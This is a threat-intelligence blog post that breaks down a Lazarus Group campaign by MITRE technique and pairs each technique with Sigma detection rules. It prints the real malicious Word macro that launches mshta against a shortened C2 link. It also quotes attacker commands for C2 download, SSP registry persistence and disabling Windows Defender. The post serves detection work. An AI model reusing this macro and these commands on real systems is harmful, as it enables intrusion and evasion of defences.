{"id":10533,"date":"2020-09-25T09:00:00","date_gmt":"2020-09-25T08:00:00","guid":{"rendered":"https:\/\/www.withsecure.com\/resources-hub\/w-labs\/catching-lazarus-threat-intelligence-to-real-detection-logic-part-one\/"},"modified":"2026-05-25T10:21:21","modified_gmt":"2026-05-25T09:21:21","slug":"catching-lazarus-threat-intelligence-to-real-detection-logic-part-one","status":"publish","type":"lab_item","link":"https:\/\/www.withsecure.com\/fr\/ressources\/w-labs\/catching-lazarus-threat-intelligence-to-real-detection-logic-part-one\/","title":{"rendered":"Catching Lazarus: Threat Intelligence to Real Detection Logic &#8211; Part One"},"content":{"rendered":"<section\n    class=\"wp-block-one-column-block edwp-block js-wp-block-one-column-block wp-block-one-column-block--content-1 wp-block-one-column-block--meta-sharing layout--spacing-xxxxl-top layout--spacing-xl-bottom\"\n    >\n    <div class=\"wp-block-one-column-block__container\">\n                                                                                                                            <div class='wp-block-one-column-block__meta-sharing-grid'><div class=\"wp-component-content wp-component-content--default wp-block-one-column-block__content fade-in\">\n            <h1 class=\"wp-component-heading text--h2 wp-component-content__title\">\n    Catching Lazarus: Threat Intelligence to Real Detection Logic &#8211; <span class=\"blue-text\">Part One<\/span><\/h1>                    <div class=\"wp-component-content__inner\">\n                                                    <div class=\"wp-component-content__meta\">\n                                                                            <span class=\"wp-component-content__meta-categories\">\n                                                                    <span class=\"wp-component-content__meta-category\">\n                                        Attack Detection                                    <\/span>\n                                                                    <span class=\"wp-component-content__meta-category\">\n                                        Endpoint Security                                    <\/span>\n                                                                    <span class=\"wp-component-content__meta-category\">\n                                        Threat intelligence                                    <\/span>\n                                                            <\/span>\n                                                                                                    <span class=\"wp-component-content__meta-date\">\n                                25 septembre, 2020                            <\/span>\n                                                                    <\/div>\n                                            <\/div>\n                <\/div><section\n    class=\"wp-block-sharing-icons edwp-block wp-block-sharing-icons--disable-border wp-block-sharing-icons--content-1 wp-block-sharing-icons--disable-container wp-block-one-column-block__sharing fade-in wp-block-one-column-block__sharing fade-in\"\n    >\n    <div class=\"wp-block-sharing-icons__container\">\n        <div class=\"wp-block-sharing-icons__inner\">\n                            <p class=\"wp-block-sharing-icons__title fade-in\">\n                    Partager cette information                <\/p>\n                        <div class=\"wp-component-socials wp-component-socials--dark-mode\">\n    \n            <a href=\"https:\/\/www.linkedin.com\/shareArticle?mini=true&#038;url=https:\/\/www.withsecure.com\/fr\/ressources\/w-labs\/catching-lazarus-threat-intelligence-to-real-detection-logic-part-one\/&#038;title=Catching%20Lazarus:%20Threat%20Intelligence%20to%20Real%20Detection%20Logic%20&#8211;%20Part%20One\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link\" title=\"Partager sur LinkedIn\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#linkedin'><\/use>\n            <\/svg>        <\/a>\n    \n            <a href=\"http:\/\/x.com\/share?text=Catching Lazarus: Threat Intelligence to Real Detection Logic &#8211; Part One&#038;url=https:\/\/www.withsecure.com\/fr\/ressources\/w-labs\/catching-lazarus-threat-intelligence-to-real-detection-logic-part-one\/\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link wp-component-socials__link--twitter\" title=\"Partager sur X (Twitter)\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#x'><\/use>\n            <\/svg>        <\/a>\n    \n    \n    <\/div>\n        <\/div>\n    <\/div>\n<\/section>\n<\/div>                                                                                <\/div>\n<\/section>\n\n\n<section\n    class=\"wp-block-one-column-block edwp-block js-wp-block-one-column-block wp-block-one-column-block--content-1 layout--spacing-xxxl-bottom\"\n    >\n    <div class=\"wp-block-one-column-block__container\">\n                                                                                                                                    <div class=\"wp-component-image__wrapper wp-block-one-column-block__image fade-in\">\n                    <figure class=\"wp-component-image__figure\">\n                                            <img loading=\"lazy\" decoding=\"async\" width=\"1200\" height=\"800\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_insights.jpg.webp\" class=\"wp-component-image\n                            wp-component-image--desktop\n                            wp-component-image--mobile\n                            wp-component-image--ratio-content-25-1 wp-component-image--fit-cover\" alt=\"\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_insights.jpg.webp 1200w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_insights-300x200.jpg.webp 300w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_insights-1024x683.jpg.webp 1024w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_insights-768x512.jpg.webp 768w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_insights-447x298.jpg.webp 447w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_insights-219x146.jpg.webp 219w\" sizes=\"auto, (max-width: 1200px) 100vw, 1200px\" \/>                                                    <\/figure>\n                    <\/div>\n                                                                                <\/div>\n<\/section>\n\n\n<section\n    class=\"wp-block-two-column-block edwp-block js-wp-block-two-column-block wp-block-two-column-block--content-1 wp-block-two-column-block__left--align-y-top wp-block-two-column-block__right--align-y-top wp-block-two-column-block--split-sidebar layout--none-top layout--spacing-xxxl-bottom\"\n    data-block-id=\"block_21e7c2a63f83fdf1029f587bcb5b5d0e\"\n    >\n    <div class=\"wp-block-two-column-block__container row-load\">\n                                                        <div class=\"wp-block-two-column-block__left\">\n                                    <div class=\"wp-component-authors-list wp-block-two-column-block__authors\">\n                    <p class=\"wp-component-authors-list__title\">\n                Authors            <\/p>\n        \n        <div class=\"wp-component-authors-list__items\">\n                                                <div class=\"wp-component-author-card \">\n    <div class=\"wp-component-author-card__media\">\n                    <span class=\"wp-component-author-card__photo-placeholder\" aria-hidden=\"true\">\n                <svg viewBox=\"0 0 64 64\" role=\"presentation\" focusable=\"false\">\n                    <path d=\"M32 34c-8.1 0-14.7 6.6-14.7 14.7v3.5h29.4v-3.5C46.7 40.6 40.1 34 32 34z\"><\/path>\n                    <path d=\"M32 31.2c6 0 10.9-4.9 10.9-10.9S38 9.4 32 9.4s-10.9 4.9-10.9 10.9S26 31.2 32 31.2z\"><\/path>\n                <\/svg>\n            <\/span>\n            <\/div>\n    <div class=\"wp-component-author-card__content\">\n                    <h3 class=\"wp-component-author-card__name\">Guillaume Couchard<\/h3>\n        \n                \n            <\/div>\n\n<\/div>\n\n                                                                <div class=\"wp-component-author-card \">\n    <div class=\"wp-component-author-card__media\">\n                    <span class=\"wp-component-author-card__photo-placeholder\" aria-hidden=\"true\">\n                <svg viewBox=\"0 0 64 64\" role=\"presentation\" focusable=\"false\">\n                    <path d=\"M32 34c-8.1 0-14.7 6.6-14.7 14.7v3.5h29.4v-3.5C46.7 40.6 40.1 34 32 34z\"><\/path>\n                    <path d=\"M32 31.2c6 0 10.9-4.9 10.9-10.9S38 9.4 32 9.4s-10.9 4.9-10.9 10.9S26 31.2 32 31.2z\"><\/path>\n                <\/svg>\n            <\/span>\n            <\/div>\n    <div class=\"wp-component-author-card__content\">\n                    <h3 class=\"wp-component-author-card__name\">Qimin Wang<\/h3>\n        \n                \n            <\/div>\n\n<\/div>\n\n                                    <\/div>\n\n                    <div class=\"wp-component-authors-list__toggle js-authors-list-toggle\">\n                <button\n                    class=\"wp-component-authors-list__toggle-btn btn btn--tertiary js-authors-list-btn\"\n                    type=\"button\"\n                    aria-expanded=\"false\"\n                >\n                    Voir tous les auteurs                    <svg class='edwp-icon edwp-icon--reg js-icon ' aria-hidden='true'>\n                <use xlink:href='#chevron'><\/use>\n            <\/svg>                <\/button>\n                <div\n                    class=\"wp-component-authors-list__items js-authors-list-extra\"\n                    hidden\n                >\n                                                                        <div class=\"wp-component-author-card \">\n    <div class=\"wp-component-author-card__media\">\n                    <span class=\"wp-component-author-card__photo-placeholder\" aria-hidden=\"true\">\n                <svg viewBox=\"0 0 64 64\" role=\"presentation\" focusable=\"false\">\n                    <path d=\"M32 34c-8.1 0-14.7 6.6-14.7 14.7v3.5h29.4v-3.5C46.7 40.6 40.1 34 32 34z\"><\/path>\n                    <path d=\"M32 31.2c6 0 10.9-4.9 10.9-10.9S38 9.4 32 9.4s-10.9 4.9-10.9 10.9S26 31.2 32 31.2z\"><\/path>\n                <\/svg>\n            <\/span>\n            <\/div>\n    <div class=\"wp-component-author-card__content\">\n                    <h3 class=\"wp-component-author-card__name\">Thiam Loong Siew<\/h3>\n        \n                \n            <\/div>\n\n<\/div>\n\n                                                            <\/div>\n            <\/div>\n            <\/div>\n<nav\n    class=\"wp-component-content-navigation wp-block-two-column-block__content-nav js-content-navigation\"\n    data-bem-base=\"wp-component-content-navigation\"\n    data-nav-column=\"left\"\n    data-nav-type=\"auto\"\n>\n            <p class=\"wp-component-content-navigation__title\">\n            Content        <\/p>\n    \n    <div class=\"wp-component-content-navigation__mobile\">\n        <label class=\"wp-component-content-navigation__mobile-label\">\n            <span class=\"wp-component-content-navigation__mobile-label-text\">\n                Navigation dans le contenu            <\/span>\n            <select class=\"wp-component-content-navigation__select js-content-navigation-select\">\n                <option value=\"\">\n                    S\u00e9lectionnez une section                <\/option>\n                            <\/select>\n        <\/label>\n    <\/div>\n\n    <div class=\"wp-component-content-navigation__desktop\">\n        <div class=\"wp-component-content-navigation__list-wrapper\">\n            <span\n                class=\"wp-component-content-navigation__indicator js-content-navigation-indicator\"\n                aria-hidden=\"true\"\n            ><\/span>\n            <ul class=\"wp-component-content-navigation__list js-content-navigation-list\">\n                            <\/ul>\n        <\/div>\n    <\/div>\n<\/nav>\n<section\n    class=\"wp-block-sharing-icons edwp-block wp-block-sharing-icons--disable-border wp-block-sharing-icons--disable-container wp-block-two-column-block__share wp-block-two-column-block__hide-mobile wp-block-two-column-block__share wp-block-two-column-block__hide-mobile\"\n    >\n    <div class=\"wp-block-sharing-icons__container\">\n        <div class=\"wp-block-sharing-icons__inner\">\n                            <p class=\"wp-block-sharing-icons__title fade-in\">\n                    Share this story                <\/p>\n                        <div class=\"wp-component-socials wp-component-socials--dark-mode\">\n    \n            <a href=\"https:\/\/www.linkedin.com\/shareArticle?mini=true&#038;url=https:\/\/www.withsecure.com\/fr\/ressources\/w-labs\/catching-lazarus-threat-intelligence-to-real-detection-logic-part-one\/&#038;title=Catching%20Lazarus:%20Threat%20Intelligence%20to%20Real%20Detection%20Logic%20&#8211;%20Part%20One\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link\" title=\"Partager sur LinkedIn\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#linkedin'><\/use>\n            <\/svg>        <\/a>\n    \n            <a href=\"http:\/\/x.com\/share?text=Catching Lazarus: Threat Intelligence to Real Detection Logic &#8211; Part One&#038;url=https:\/\/www.withsecure.com\/fr\/ressources\/w-labs\/catching-lazarus-threat-intelligence-to-real-detection-logic-part-one\/\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link wp-component-socials__link--twitter\" title=\"Partager sur X (Twitter)\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#x'><\/use>\n            <\/svg>        <\/a>\n    \n    \n    <\/div>\n        <\/div>\n    <\/div>\n<\/section>\n                <\/div>\n                                                <div class=\"wp-block-two-column-block__right\">\n                                <div class=\"wp-component-paragraph wp-block-two-column-block__paragraph \">\n    <h2>Introduction<\/h2>\n<p>This is the first of two blog posts from the F-Secure Countercept team discussing how the Tactics, Techniques and Procedures (TTPs) used by the Lazarus Group in a recent campaign can be turned into detection logic. In this post we will share open source Sigma<a href=\"https:\/\/github.com\/Neo23x0\/sigma\" target=\"_blank\" rel=\"noopener\">[1<\/a>] rules and actionable detection insights to enable blue teams to detect attacks using the same or similar techniques. The foundation of this work is a report<a href=\"https:\/\/labs.withsecure.com\/publications\/ti-report-lazarus-group-cryptocurrency-vertical\/\" target=\"_blank\" rel=\"noopener\">[2<\/a>] from the F-Secure Threat Intelligence Team which exposed and detailed some of the Lazarus Group\u2019s current modus operandi. Our second blog will look at further techniques employed by the Lazarus Group once they establish a foothold on a network.<\/p>\n<p>From the Threat Intelligence report, we know that the Lazarus Group employed varying techniques across the MITRE ATT&amp;CK\u00ae Matrix<a href=\"https:\/\/attack.mitre.org\/matrices\/enterprise\/\" target=\"_blank\" rel=\"noopener\">[3<\/a>] in their attack. The reason for this blog\u2019s focus on TTPs is twofold. First, TTPs are more difficult and costly to change, as compared to Indicators of Compromise (IOCs) such as filenames, hashes and IP addresses. This makes detection based on TTPs more reliable as blue teams can detect malicious activity even when IOCs change. Second, TTPs can be common across threat actors and detecting the TTPs used by the Lazarus Group will aid the detection of many other threat actors. For example, according to MITRE, detecting the technique \u201cSigned Binary Proxy Execution: Mshta\u201d provides coverage for 10 other APT groups<a href=\"https:\/\/attack.mitre.org\/techniques\/T1218\/005\/\" target=\"_blank\" rel=\"noopener\">[4<\/a>] (this detail is in the \u201cProcedure Examples\u201d section for each MITRE technique).<\/p>\n<p>At F-Secure Countercept, we use a signature format similar to Sigma rules in our detection and response operations. Since Sigma rules provide a standardized open source signature format, which allows blue teams to build detections that can be applied to many different SIEM log formats, we aim to provide detection value by contributing Sigma rules specific to the detection of each relevant MITRE technique.<\/p>\n<p>While Sigma rules offer a powerful and flexible rule syntax for detection, using detection rules alone is not always the best approach for threat detection. Blue teams can also benefit from using hunt queries (using Jupyter Notebooks<a href=\"https:\/\/jupyter.org\/\" target=\"_blank\" rel=\"noopener\">[5<\/a>] for example) when more complex correlations between different datatypes are required for an accurate detection. While hunt queries allow more flexibility in working with different datatypes, they can consume more resources, hence why sometimes classic detection capabilities are preferred. Over this and the following blog, we will also highlight instances where hunt queries could aid in the detection of malicious activity.<\/p>\n<h3>Breaking down the Lazarus Group campaign with MITRE<\/h3>\n<p>The following sections in this document map the key attack techniques used by the Lazarus Group into the relevant MITRE ATT&amp;CK\u00ae Matrix tactics. We then discuss how to detect these techniques using Sigma rules.<\/p>\n<p>The Sigma rules created for this report are marked in bold in the table below and are provided in the F-Secure Countercept GitHub repository<a href=\"https:\/\/github.com\/countercept\/lazarus-sigma-rules\" target=\"_blank\" rel=\"noopener\">[6<\/a>]. Existing Sigma rules are also listed below, as some techniques were already covered.<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/2020-09-16-lazarus-blog-chart-image-f-secure-2000x1200px2.jpg.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<h2>Initial Access<\/h2>\n<h3>T1566.003 \u2013 Phishing: Spearphishing via Service<\/h3>\n<p>The Lazarus Group gained initial access on the target organization by sending a phishing document to a systems administrator via their personal LinkedIn account. The document masqueraded as a legitimate job advert. The embedded macro code was successfully executed on the target organization\u2019s endpoint when the victim opened the document and enabled macro execution.<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/2020-09-17-lazarus-blog-images-diagrams-f-secure-2000x1200px-final-v2-1.jpg.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>Detection<\/p>\n<p>It can be challenging to detect malicious documents as the embedded code is often obfuscated to evade detection from anti-virus and static file analysis. That said, an effective detection approach is to look for malicious events that occur once the file is opened and the embedded payload is executed.<\/p>\n<p>To demonstrate this, we downloaded and executed a malicious Word document<a href=\"https:\/\/www.virustotal.com\/gui\/file\/7446efa798cfa7908e78e7fb2bf3ac57486be4d2edea8a798683c949d504dee6\/details\" target=\"_blank\" rel=\"noopener\">[7]<\/a> associated with the Lazarus Group&#x27;s campaign to investigate the behavior of the embedded payload. Upon execution of the macro contained in the document, there are no \u2018quick wins\u2019 for detection opportunities, such as winword.exe launching processes such as PowerShell or cmd. We also did not observe other signs of suspicious activity, such as external network connections being created directly from the winword.exe process.<\/p>\n<p>Instead we observed that the document writes a LNK file (named \u2018esk.lnk\u2019) to the user\u2018s temporary file directory (determined through the GetSpecialFolder(2) method), and subsequently launches the created shortcut file with Explorer.exe. This process can be seen in more detail by examining the macro code embedded in the Word document:<\/p>\n<pre><code class=\"language-bash\">Sub AutoOpen()\nOn Error Resume Next\nSet FSS = CreateObject(&quot;Scripting.FileSystemObject&quot;)\nLPath = FSS.GetSpecialFolder(2) &amp; &quot;\\esk.l&quot; &amp; &quot;nk&quot;\nExPath = &quot;explorer &quot; &amp; LPath\nSet SHH = CreateObject(&quot;wscript.shell&quot;)\nSet LKO = SHH.CreateShortcut(LPath)\nLKO.TargetPath = &quot;mshta&quot;\nLKO.Arguments = &quot;ht&quot; &amp; &quot;tps:\/&quot; &amp; &quot;\/bi&quot; &amp; &quot;t.ly\/&quot; &amp; &quot;2vwLE0m&quot;\nLKO.Save\nSHH.Run ExPath\nActiveDocument.Content.Font.Color = 0\nActiveDocument.ActiveWindow.View.Type = wdPrintView\nActiveDocument.Content.Font.Size = 12\nDim Splash As Shape\nFor Each Splash In ActiveDocument.Shapes\nIf Splash.AlternativeText = &quot;G&quot; &amp; &quot;DP&quot; &amp; &quot;R&quot; Then\nSplash.Width = Splash.Height = 0\nEnd If\nNext Splash\nActiveDocument.ActiveWindow.View.ShowHiddenText = False\nActiveDocument.ActiveWindow.View.ReadingLayout = False\nActiveDocument.Content.Font.Hidden = False\nEnd Sub<\/code><\/pre>\n<p>Two Sigma rules have been written to detect this anomalous behavior these can be found in our GitHub repository and are named win_word_create_lnk and win_word_launch_explorer respectively.<\/p>\n<p>win_word_create_lnk<\/p>\n<p>Based on F-Secure Countercept\u2019s endpoint telemetry, it is common behavior for the Microsoft Word process (winword.exe) to create shortcut files for every Word document it opens. These files are usually stored in one of the following directories:<\/p>\n<ul>\n<li>%UserProfile%\\AppData\\Roaming\\Microsoft\\Office\\Recent\\<\/li>\n<li>%UserProfile%\\AppData\\Roaming\\Microsoft\\Word\\<\/li>\n<\/ul>\n<p>With the exclusion of these two directories from the Sigma rule, we observed very few false positives of legitimate shortcut files being created in other directories.<\/p>\n<p>The detection logic of this rule could also be extended to cover additional office applications (such as Excel) and to detect other high-risk filetypes being created, such as executable files or vba scripts.<\/p>\n<p>win_word_launch_explorer<\/p>\n<p>From our telemetry, we observed that the parent-child relationship of Winword.exe launching Explorer.exe was rare and non-existent in many networks. However, there are some client networks where false positives occurred due more customised use of Word documents within the organization. Therefore, blue teams working with noisy networks may consider filtering for \u201c.lnk\u201d (and other high-risk extensions) in the command line arguments of Explorer.exe for a higher fidelity rule.<\/p>\n<h2>Execution<\/h2>\n<h3>T1059.005 \u2013 Command and Scripting Interpreter: Visual Basic<\/h3>\n<p>Execution of the .lnk file dropped by the malicious office document results in Mshta.exe connecting to a \u201cbit.ly\u201d link to download a secondary payload. The \u201cbit.ly\u201d link redirected to a Command and Control (C2) domain from which a VBScript was retrieved and executed to perform enumeration and collect further information on the host.<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/2020-09-17-lazarus-blog-images-diagrams-f-secure-2000x1200px-final-v25.jpg.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>Detection<\/p>\n<p>From the technical details covered in the Weibu Intelligence Bureau report<a href=\"https:\/\/x.threatbook.cn\/nodev4\/vb4\/article?threatInfoID=2371\" target=\"_blank\" rel=\"noopener\">[8]<\/a>, we were able to simulate the Mshta execution of a VBScript hosted on a web server. It became clear in the simulation that the malicious VBScript hosted on the C2 domain was accessed and executed within the Mshta process. This means that there will not be any process creation telemetry that can point to the execution of the VBScript.<\/p>\n<p>Nonetheless, the execution of VBScript can be detected by analyzing image load events, which are logged whenever a module is loaded into a process<a href=\"https:\/\/www.ultimatewindowssecurity.com\/securitylog\/encyclopedia\/event.aspx?eventid=90007\" target=\"_blank\" rel=\"noopener\">[9]<\/a>. In order to execute VBScript, the Mshta process will have to load the \u201cvbscript.dll\u201d module from disk which contains API functions for VBScript. The Sigma rule created to detect this behavior can be found on our GitHub and is named win_mshta_load_vbscript.<\/p>\n<h3>T1059.001 \u2013 Command and Scripting Interpreter: PowerShell<\/h3>\n<p>Threat actors are known to commonly leverage PowerShell in their attacks due to its efficacy in interacting with Windows subsystems. This is also the case for Lazarus Group, where a PowerShell script was utilized to retrieve further payloads from their C2 domain:<\/p>\n<p>C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -w Hidden -ep Bypass -file C:Users\\&lt;USER&gt;\\AppData\\Local\\Temp\\usoclient.ps1 66.181.166[.]15:8080\/uc 188652471<\/p>\n<p>Detection<\/p>\n<p>As PowerShell is also a common tool among system administrators, a simple detection of its execution will often result in significant false positives. However, there are certain arguments that tend to be more suspicious than others, such as the setting of Window style to \u201cHidden\u201d, and the temporary &quot;Bypass\u201d of the execution policy. There is an existing Sigma rule <a href=\"https:\/\/github.com\/Neo23x0\/sigma\/blob\/master\/rules\/windows\/powershell\/powershell_suspicious_invocation_specific.yml\" target=\"_blank\" rel=\"noopener\">[10]<\/a> to detect the presence of these arguments.<\/p>\n<p>In addition to the above, alerting on PowerShell arguments that contain references to external IP addresses could be an effective detection mechanism. For MDR providers (such as F-Secure Countercept) this type of detection rule will often result in false positives due to the number of administrative scripts on client estates which exhibit this behavior. However, for internal detection teams this could prove to be a high-fidelity detection rule once the known administrative scripts are filtered out. The Sigma rule created to detect this behavior can be found on our GitHub and is named  win_powershell_ip_args.<\/p>\n<p>For MDR providers \u2013 or for detection in &#x27;noisy\u2019 estates \u2013 hunting instead of alerting for this behavior is probably the most effective approach. Searching for PowerShell processes launched with arguments containing external IP addresses, and then aggregating the results on the PowerShell arguments should result in an effective hunt query to look for this behavior. If you are interested in exploring hunt queries, SpecterOps have a fantastic blog series<a href=\"https:\/\/posts.specterops.io\/threat-hunting-with-jupyter-notebooks-part-1-your-first-notebook-9a99a781fde7\" target=\"_blank\" rel=\"noopener\">[11]<\/a> covering threat hunting with Jupyter notebooks.<\/p>\n<h2>Persistence<\/h2>\n<h3>T1547.005 \u2013 Boot or Logon Autostart Execution: Security Support Provider (SSP)<\/h3>\n<p>Windows SSP DLLs provide applications access to Windows authentication methods such as NTLM and Kerberos<a href=\"https:\/\/docs.microsoft.com\/en-us\/windows\/win32\/rpc\/security-support-providers-ssps-\" target=\"_blank\" rel=\"noopener\">[12]<\/a>. SSP DLLs are loaded into the Local Security Authority (LSA) process on every machine boot and will execute with SYSTEM privileges once loaded. Lazarus Group added a malicious \u201cLSCC.dll\u201d file as an SSP, via the following command:<\/p>\n<p>reg add HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\Lsa \/v Security Packages \/t REG_MULTI_SZ \/d lssc \/f<\/p>\n<p>As Sean Metcalf pointed out in his blog<a href=\"https:\/\/adsecurity.org\/?p=1760\" target=\"_blank\" rel=\"noopener\">[13]<\/a>, adding a new SSP is quite easy and is a well-known technique used by many attackers. In fact, PowerSploit has an Install-SSP function in its Persistence module <a href=\"https:\/\/github.com\/PowerShellMafia\/PowerSploit\/blob\/master\/Persistence\/Persistence.psm1\" target=\"_blank\" rel=\"noopener\">[14]<\/a>, allowing threat actors to add a new malicious SSP as the Lazarus Group did.<\/p>\n<p>Detection<\/p>\n<p>This technique consists of two simple steps. First, add the malicious DLL in \u201cC:\\Windows\\System32\\\u201d. Next, update the Security Packages registry key with the name of the DLL which was added in System32. A single command can be used to achieve this step, as shown from the above code block by Lazarus Group.<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/2020-09-17-lazarus-blog-images-diagrams-f-secure-2000x1200px-final-v24.jpg.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>Detection is therefore straightforward and can be achieved by looking at the \u201cSecurity Packages\u201d registry key modification. There is already an existing Sigma rule<a href=\"https:\/\/github.com\/Neo23x0\/sigma\/blob\/master\/rules\/windows\/registry_event\/sysmon_ssp_added_lsa_config.yml\" target=\"_blank\" rel=\"noopener\">[15]<\/a> for this. This rule will detect any changes to this specific registry key, so the method used to modify the key does not matter. For example, the threat actor could use PowerShell cmdlets<a href=\"https:\/\/devblogs.microsoft.com\/scripting\/weekend-scripter-use-powershell-to-easily-modify-registry-property-values\/\" target=\"_blank\" rel=\"noopener\">[16]<\/a> or even the user interface application Regedit.exe instead of Reg commands.<\/p>\n<h2>Defense Evasion<\/h2>\n<h3>T1218.005 \u2013 Signed Binary Proxy Execution: Mshta<\/h3>\n<p>Leveraging pre-installed windows binaries to bypass traditional signature-based defenses and execute malicious content has been a common technique utilized by threat actors.<\/p>\n<p>As pointed out earlier, the Lazarus Group for instance, was observed using Mshta.exe to execute malicious scripts via a &quot;bit.ly&quot; redirect as seen below:<\/p>\n<p>mshta.exe https:\/\/bit[.]ly\/2vvLE0n<\/p>\n<p>To find out more about these binaries, often referred to as \u201cLiving Off the Land Binaries\u201d (LOLBin), blue teams may refer to the LOLBAS project<a href=\"http:\/\/https\/lolbas-project.github.io\/#\/execute\">[17]<\/a> on their excellent documentation of all discovered LOL binaries and scripts.<\/p>\n<p>Detection<\/p>\n<p>Signed binaries like Mshta.exe are often used for legitimate purposes, so from a detection perspective it is crucial to differentiate between legitimate and malicious usage. One way of approaching this would be to analyze the command arguments. Based on historical endpoint data from F-Secure Countercept, use of \u201cbit.ly\u201d and other common redirection or codeshare sites like \u201cpastebin.com\u201d in command arguments is rare and uncommon. A Sigma rule has thus been written to detect binaries launched with \u201cbit.ly\u201d links and other popular codeshare sites in the arguments. Web browser binaries are commonly observed false positives and have been excluded from the detection. The Sigma rule created to detect this behavior can be found on our GitHub and is named win_nonbrowser_susp_url.<\/p>\n<p>Another way to check for malicious usage of Mshta is to look at the child process(es) launched by the executable. To perform post-exploitation tasks, malicious scripts often launch shells such as Cmd.exe. Since Mshta proxies the execution of the script content, this will result in process creation telemetry where Mshta launches Cmd.exe as a child process.<\/p>\n<p>According to the Weibu Intelligence Bureau report<a href=\"https:\/\/x.threatbook.cn\/nodev4\/vb4\/article?threatInfoID=2371\" target=\"_blank\" rel=\"noopener\">[18]<\/a> this is also the case for Lazarus Group\u2019s campaign, where the bit.ly link executed by Mshta contained VBScript which made use of the WshShell object to launch Cmd.exe.  An existing Sigma rule is already available to detect suspicious process creation by Mshta<a href=\"https:\/\/github.com\/Neo23x0\/sigma\/blob\/master\/rules\/windows\/process_creation\/win_mshta_spawn_shell.yml\" target=\"_blank\" rel=\"noopener\">[19<\/a>].<\/p>\n<h3>T1562.001 \u2013 Impair Defenses: Disable or Modify Tools<\/h3>\n<p>Disabling Windows Defender<\/p>\n<p>Once the Lazarus group established a foothold using the above LOLBin technique, the actor used the following PowerShell commands to disable Windows Defender monitoring as one of their first actions on each host they accessed:<\/p>\n<pre><code class=\"language-bash\">cmd.exe \/c C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\nSet-MpPreference -DisableBehaviorMonitoring $false 2&gt;&amp;1\n\ncmd.exe \/c C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe \nSet-MpPreference -DisableRealtimeMonitoring $true 2&gt;&amp;1<\/code><\/pre>\n<p>Detection<\/p>\n<p>The commands above leverage the built-in functions for Windows Defender<a href=\"https:\/\/docs.microsoft.com\/en-us\/powershell\/module\/defender\/set-mppreference?view=win10-ps\" target=\"_blank\" rel=\"noopener\">[20]<\/a>, which are often used for legitimate purposes. Detection for this can be as simple as filtering for the parameters \u201cDisableRealTimeMonitoring\u201d OR \u201cDisableBehaviorMonitoring\u201d in command line arguments or PowerShell script blocks.<\/p>\n<p>However, some Integrated Development Environment (IDE) applications such as those developed by JetBrains are known to check for these Windows Defender parameters by using the Get-MpPreference cmdlet. Therefore, blue teams may wish to filter for the \u201cSet-MpPreference\u201d command alongside the two parameters. Otherwise, known false positives such as \u201cPycharm64.exe\u201d and binaries residing in the \u201cJetbrains\u201d path can be excluded. The latter option results in a more generic rule which also detects for the enumeration of the two parameters. The Sigma rule created to detect this behavior can be found on our GitHub and is named win_powershell_disable_windefender.<\/p>\n<h2>Conclusion<\/h2>\n<p>In this first part of our two-part blog posts series, we demonstrated how blue teams can capitalize on the technical insights from threat intelligence reports to build detection logic and actionable detection rules. Although the Lazarus Group used specific commands to carry out each technique, we showed that with some additional research blue teams can create powerful detection rules which will cover a larger set of attack vectors. We also showed that although the Lazarus group used various techniques and tools to avoid detection as they gained access to the victim network, there were still plenty of detection opportunities for blue teams to identify the threat actor\u2019s activities.<\/p>\n<p>Although we have focused purely on the detection aspect throughout this blog post, it is also notable that the Lazarus Group relied on techniques which could have been prevented by implementing common security controls. For example: limiting or disabling macro execution for documents from untrusted sources would have prevented the execution of the malicious document which provided the initial foothold on the victim network. Other controls, such as network proxy content filtering or domain categorization could also have prevented the initial C2 connection, or the subsequent connections to other domains used by the threat actor to download additional tooling.<\/p>\n<p>In this blog post we covered the Initial Access, Execution, Persistence and some of the Defense Evasion phases from the MITRE ATT&amp;CK\u00ae Matrix and provided relevant Sigma rules and detection tips. As every network is different, we recommend studying the provided Sigma rules before implementing them in your environment. The process of introducing new rules to a network is often an iterative process of development and whitelisting in order to get the rules to a suitable level of fidelity.<\/p>\n<p>All of the new Sigma rules referenced throughout this blog post can be found <a href=\"https:\/\/github.com\/countercept\/lazarus-sigma-rules\" target=\"_blank\" rel=\"noopener\">here<\/a>.<\/p>\n<p>In the second part of this blog series we will cover techniques used by the Lazarus Group for Defense Evasion (yes, there is more to come!), Credential Access, Lateral Movement and Command &amp; Control phases, so stay tuned!<\/p>\n<\/div>\n<section\n    class=\"wp-block-sharing-icons edwp-block 